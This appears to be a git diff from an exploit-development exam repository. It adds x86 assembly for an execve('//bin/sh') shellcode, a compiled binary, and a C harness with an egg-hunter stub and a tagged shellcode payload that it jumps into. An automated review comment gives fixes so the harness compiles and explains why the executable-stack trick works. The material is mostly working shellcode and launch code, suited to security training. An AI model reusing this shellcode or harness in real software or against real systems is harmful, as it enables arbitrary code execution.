'//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + 
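Review bot: The C source written by the heredoc declares `main()` with no return type, which relies on implicit int that C99 removed and that recent GCC releases reject by default, and it passes the `size_t` result of `strlen` to `%d`; `int main(void)` and `printf("Hunter Length: %zu\n", strlen(hunter));` (likewise for the payload line) make the generated file compile cleanly under `-m32`. The `#include` lines appear empty in this listing, presumably `<stdio.h>` and `<string.h>` lost in rendering — worth confirming the heredoc really emits them, since the shellcode.c files committed alongside show the same blank includes. Note also that `-z execstack` only marks the stack executable while `hunter` and `payload` live in writable .data; the jump into them works on 32-bit Linux only because an executable PT_GNU_STACK makes the kernel map readable pages as executable, and `-fno-stack-protector` does nothing for this program — a line in NOTES explaining that would spare the next reader a surprise. This file is byte-identical to exam3/access/make.sh (same blob index), so the `#!/usr/bin/env sh` versus bash-array mismatch raised there applies here as well.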
diff --git a/exam3/basic/shellcode b/exam3/basic/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..bb8215c044c161344c933136879a715d4a647ba9 GIT binary patch literal 5100 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 literal 0 HcmV?d00001 diff --git a/exam3/basic/shellcode.c b/exam3/basic/shellcode.c new file mode 100644 index 0000000..feaf2d7 --- /dev/null +++ b/exam3/basic/shellcode.c @@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +}